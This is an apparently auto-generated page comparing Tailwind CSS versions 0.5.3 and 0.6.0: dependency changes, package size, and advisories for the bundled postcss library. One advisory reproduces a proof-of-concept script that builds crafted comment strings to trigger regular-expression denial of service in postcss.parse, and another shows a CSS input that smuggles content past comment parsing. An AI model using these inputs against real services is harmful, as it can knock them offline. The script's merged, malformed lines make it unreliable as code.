Tailwind CSS saw a notable update from version 0.5.3 to 0.6.0, offering refinements for developers leveraging this utility-first CSS framework. While the core premise remained the same—rapidly building custom user interfaces—several key changes landed under the hood. The most apparent modification lies within the dependencies, where lodash was bumped from version 4.17.4 to 4.17.5, indicating minor bug fixes or performance tweaks in the utility library. A new dependency, css.escape, was added to version 0.6.0, which implies enhanced handling of CSS escaping. While development dependencies remain largely identical, the core build process shows some significant refinement. The dist object reveals vital packaging differences. The file count increased slightly from 106 to 108, implying the addition of new files or a restructure of existing ones. A more significant change is the increase in unpackedSize from 1473804 bytes to 2032401 bytes, pointing to a larger overall footprint, likely encompassing new features, expanded utility classes, or more comprehensive documentation bundled directly within the package. Finally, the update was released on 2018-06-21, marking a clear point of demarcation for developers considering upgrading. Considering these points, moving to 0.6.0 appears to bring a range of small improvements and refinements.
All the vulnerabilities related to the version 0.6.0 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.